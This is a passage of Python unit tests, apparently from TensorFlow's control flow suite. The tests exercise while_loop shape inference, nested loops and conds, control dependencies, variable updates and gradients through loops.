self.assertEqual(r.dense_shape.get_shape()[0], 1)
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None])])
self.assertEqual(r.dense_shape.get_shape().as_list(), [None])
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([5])])
@test_util.disable_control_flow_v2("b/116282023 (IndexedSlices)")
@test_util.run_v1_only("b/120545219")
def testWhileShapeInferenceIndexedSlices(self):
with self.cached_session():
values = constant_op.constant([[2.0, 4.0], [3.0, 5.0]], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10, 2], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
self.assertEqual(r.dense_shape.get_shape()[0], 2)
self.assertEqual(r.values.get_shape(), tensor_shape.TensorShape([2, 2]))
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 2])])
self.assertEqual(r.dense_shape.get_shape()[0], 2)
self.assertEqual(r.values.get_shape().as_list(), [None, 2])
with self.assertRaisesRegexp(ValueError, "is not compatible with"):
_, r = control_flow_ops.while_loop(
c, b, [i, x],
[i.get_shape(), tensor_shape.TensorShape([None, 5])])
def _testNestedWhile_1(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
n = constant_op.constant(0)
def cpu_sum(s):
c = lambda i, s: math_ops.less(i, 10)
def b(i, s):
i1 = math_ops.add(i, 1)
with ops.device("/cpu:0"):
s1 = math_ops.add(i, s)
return i1, s1
_, r_s = control_flow_ops.while_loop(c, b, [n, s])
return r_s
c = lambda x: math_ops.less(x, 200)
b = lambda x: math_ops.add(x, cpu_sum(n))
r = control_flow_ops.while_loop(c, b, [n])
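      # cpu_sum(0) is 0 + 1 + ... + 9 = 45, so the outer loop runs five times
      # and returns 45 * 5 = 225.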
self.assertEqual(225, self.evaluate(r))
def testNestedWhile_1(self):
self._testNestedWhile_1(use_gpu=False)
self._testNestedWhile_1(use_gpu=True)
def _testNestedWhile_2(self, use_gpu):
    # Test the cases where the edges A -> Enter and Exit -> A are partitioned.
with self.cached_session(use_gpu=use_gpu):
s0 = constant_op.constant(2.0)
def inner_loop(s):
c = lambda s: math_ops.less(s, 20.0)
def b(s):
s1 = math_ops.add(s, s)
return s1
r_s = control_flow_ops.while_loop(c, b, [s], parallel_iterations=1)
return r_s
outer_c = lambda x: math_ops.less(x, 3000.0)
def outer_b(x):
x = logging_ops.Print(x, [x]) # Edge "Print -> Enter" is partitioned
x = inner_loop(x)
with ops.device("/cpu:0"):
x = math_ops.square(x) # Edge "Exit -> Square" is partitioned
return x
r = control_flow_ops.while_loop(
outer_c, outer_b, [s0], parallel_iterations=1)
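      # First outer pass: 2.0 doubles to 32.0 and is squared to 1024.0; the
      # second pass squares again, giving 1048576.0.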
self.assertEqual(1048576.0, self.evaluate(r))
def testNestedWhile_2(self):
self._testNestedWhile_2(use_gpu=False)
self._testNestedWhile_2(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_1(self):
with self.cached_session():
n = constant_op.constant(0)
r = constant_op.constant(0)
condition = lambda n_, r_: math_ops.less(n_, 10)
def body(n_, r_):
n_ = math_ops.add(n_, 1)
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [n_, r_]
res = control_flow_ops.while_loop(
condition, body, [n, r], parallel_iterations=1)
self.assertAllEqual(12, res[1])
@test_util.run_deprecated_v1
def testWhileWithControl_2(self):
with self.cached_session():
r = constant_op.constant(0)
condition = lambda r_: math_ops.less(r_, 10)
def body(r_):
with r_.graph.control_dependencies([r_]):
r_ = constant_op.constant(12)
return [r_]
res = control_flow_ops.while_loop(
condition, body, [r], parallel_iterations=1)
self.assertAllEqual(12, self.evaluate(res))
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_3(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(lambda x: x < 10, lambda x: x + c, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.disable_control_flow_v2("b/79881896 (control_deps)")
@test_util.run_v1_only("b/120545219")
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
    # Ensure that no control edges from an outer control dependency context are
    # added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, self.evaluate(loop))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testWhileCondWithControl_1(self):
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
self.evaluate(variables.global_variables_initializer())
self.assertEqual(4, self.evaluate(r))
self.assertAllClose(65536.0, self.evaluate(v))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
@test_util.run_v1_only("b/120545219")
def testWhileCondExitControl(self):
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
        # Make sure the control edge from Exit to a node is handled correctly.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(6.0, self.evaluate(r))
self.assertEqual(99, self.evaluate(v))
def testCondWhile_1(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, self.evaluate(r))
def testCondWhile_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, self.evaluate(r))
def _testCondWhile_3(self, use_gpu):
with self.cached_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10., sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
@test_util.disable_control_flow_v2("b/116743589")
@test_util.run_deprecated_v1
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, self.evaluate(r))
def testWhileCond_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: control_flow_ops.cond(constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, self.evaluate(r))
def testWhileCond_3(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, self.evaluate(r))
@test_util.run_deprecated_v1
def testWhileCondGradMultiDevice(self):
config = config_pb2.ConfigProto(device_count={"CPU": 2},
allow_soft_placement=True)
with self.cached_session(use_gpu=True, config=config) as sess:
pred = array_ops.placeholder(dtypes.bool, [])
x_init = constant_op.constant(1.0)
with ops.device("/cpu:0"):
z = control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, control_flow_ops.cond(
pred, lambda: x * 2.0, lambda: 10.0)),
[0, x_init])
with ops.device("/cpu:1"):
grad = gradients_impl.gradients(z, x_init)[0]
with ops.device("/cpu:0"):
grad_grad = gradients_impl.gradients(grad, x_init)[0]
self.assertEqual(sess.run(grad, {pred: True}), 8.0)
self.assertEqual(sess.run(grad, {pred: False}), 0.0)
if not control_flow_util.ENABLE_CONTROL_FLOW_V2:
return
self.assertEqual(sess.run(grad_grad, {pred: True}), 0.0)
self.assertEqual(sess.run(grad_grad, {pred: False}), 0.0)
# NOTE: It is ok to have parallel_iterations > 1
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_deprecated_v1
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3, self.evaluate(r))
result = self.evaluate(select)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
self.assertEqual(3, self.evaluate(r))
result1 = self.evaluate(select1)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = self.evaluate(select2)
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
self.evaluate(variables.global_variables_initializer())
result = r[1]
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
self.evaluate(variables.global_variables_initializer())
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
self.assertEqual(10, self.evaluate(var_b))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
self.evaluate(variables.global_variables_initializer())
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
self.assertEqual(10, self.evaluate(var_a))
self.assertEqual(10, self.evaluate(var_b))
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
@test_util.run_v1_only("b/120545219")
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
self.evaluate(variables.global_variables_initializer())
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, self.evaluate(var_b))
self.evaluate(lpa) # Run the loop
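      # var_a counts up to 10 and var_b accumulates 1 + 2 + ... + 10 = 55.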
self.assertEqual(55, self.evaluate(var_b))
self.assertEqual(10, self.evaluate(var_a))
@test_util.run_v1_only("b/120545219")
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], self.evaluate(r))
for i in xrange(10):
self.assertEqual([i], self.evaluate(q.dequeue()))
@test_util.run_v1_only("b/120545219")
def testWhileTimeOut(self):
run_options = config_pb2.RunOptions(timeout_in_ms=1)
with self.cached_session() as sess:
n = constant_op.constant(0)
c = lambda x: True
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.while_loop(c, b, [n])
with self.assertRaises(errors_impl.DeadlineExceededError):
sess.run(r, options=run_options)
@test_util.disable_control_flow_v2("b/117119329 (stack)")
@test_util.run_v1_only("b/120545219")
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
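      # The first loop pushes 0..9 onto the stack; the second pops them all
      # and sums them to 45.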
self.assertEqual(45, self.evaluate(rx))
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
          # Without colocation, only the forward Square op has the GPU device.
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
          # With colocation, both the forward and backward Square/Square_grad
          # ops have the GPU device.
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.session(graph=graph) as sess:
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.disable_control_flow_v2("b/116351701 (colocation)")
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
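      # Three squarings give r = v**8, so dr/dv = 8 * v**7 = 1024 at v = 2.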
self.assertAllClose(1024.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
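      # r[1] = 2 * x**5 elementwise, so dr/dx = 10 * x**4: 810.0 at x = 3.0
      # and 2560.0 at x = 4.0.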
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
@test_util.run_deprecated_v1
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
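      # r = (v**8)**2 = v**16, so dr/dv = 16 * v**15 = 524288 at v = 2.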
self.assertEqual(524288.0, self.evaluate(r))
@test_util.run_v1_only("b/120545219")
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
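      # r = v**8 + v**8 = 2 * v**8, so dr/dv = 16 * v**7 = 2048 at v = 2.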
self.assertAllClose(2048.0, self.evaluate(r))
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.cached_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
grad_a_val, grad_v_val = self.evaluate([grad_a, grad_v])
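      # Four multiplications give r = v * a**4, so dr/da = 4 * v * a**3 = 216
      # and dr/dv = a**4 = 81.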
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
@test_util.disable_control_flow_v2("b/116630618 (parallel_iters: times out)")
@test_util.run_deprecated_v1
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
with self.cached_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, self.evaluate(r))
@test_util.run_deprecated_v1
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
@test_util.run_deprecated_v1
def testNestedWhileCondWhileGradGpu(self):
self._testNestedWhileCondWhileGrad(use_gpu=True)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(216.0, r[0])
@test_util.run_deprecated_v1
def testWhileGrad_ResourceVariable(self):
with self.cached_session():
a = resource_variable_ops.ResourceVariable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
g = gradients_impl.gradients(r, a)
self.evaluate(variables.global_variables_initializer())
self.assertAllClose(216.0, g[0])
@test_util.run_v1_only("b/120545219")
def testWhileGradInCond(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)[0]
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116340060")
@test_util.run_v1_only("b/120545219")
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
@test_util.run_v1_only("b/120545219")
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.run_v1_only("b/120545219")
def testCondGradInNestedWhiles(self):
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = self.evaluate([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
@test_util.run_gpu_only
def testGpuResourceAccess(self):
with ops.device(test.gpu_device_name()):
var = resource_variable_ops.ResourceVariable(constant_op.constant(3.0))
@def_function.function
def foo():
return control_flow_ops.while_loop(
lambda i, _: i < 3,
lambda i, x: (i + 1, control_flow_ops.cond(
constant_op.constant(True),
lambda: x + var,
lambda: x)),
[0, 0.0])[1]
self.evaluate(variables.global_variables_initializer())
self.assertEqual(self.evaluate(foo()), 9.0)
def testNestedResourceAccess(self):
var = resource_variable_ops.ResourceVariable(constant_op.constant(3.0))
@eager_function.defun
def test_fn():
x = constant_op.constant(0.0)
r = control_flow_ops.while_loop(
# Outer loop condition
lambda i, y: i < 2,
# Outer loop body
lambda i, y: (i + 1, y + control_flow_ops.cond(
constant_op.constant(True),
# True branch
lambda: control_flow_ops.while_loop(
# Inner loop condition
lambda j, z: j < 3,
# Inner loop body
lambda j, z: (j + 1, z + math_ops.square(var)),
# Inner initial loop value
[0, y])[1],
# False branch
lambda: (0.0))),
# Outer initial loop value
[0, x])[1]
grad = gradients_impl.gradients(r, x)[0]
return r, grad
self.evaluate(variables.global_variables_initializer())
r, grad = self.evaluate(test_fn())
# 2 * 3 * 3^2
self.assertEqual(r, 81.0)
# v1 control flow gets the wrong answer!!!
# Gradient computation:
# f(x) = x + 3^2
# inner_loop(x) = f(f(f(x))) = x + 3*3^2 = x + 27
# g(x) = x + inner_loop(x) = 2x + 27
# outer_loop(x) = g(g(x)) = 4x + 81
# outer_loop'(x) = 4
# Note that v1 control flow gets 4.0 as well if the cond is removed.
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
self.assertEqual(grad, 4.0)
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
self.evaluate(r_flattened))
@test_util.run_v1_only("b/120545219")
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
@test_util.run_v1_only("b/120545219")
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
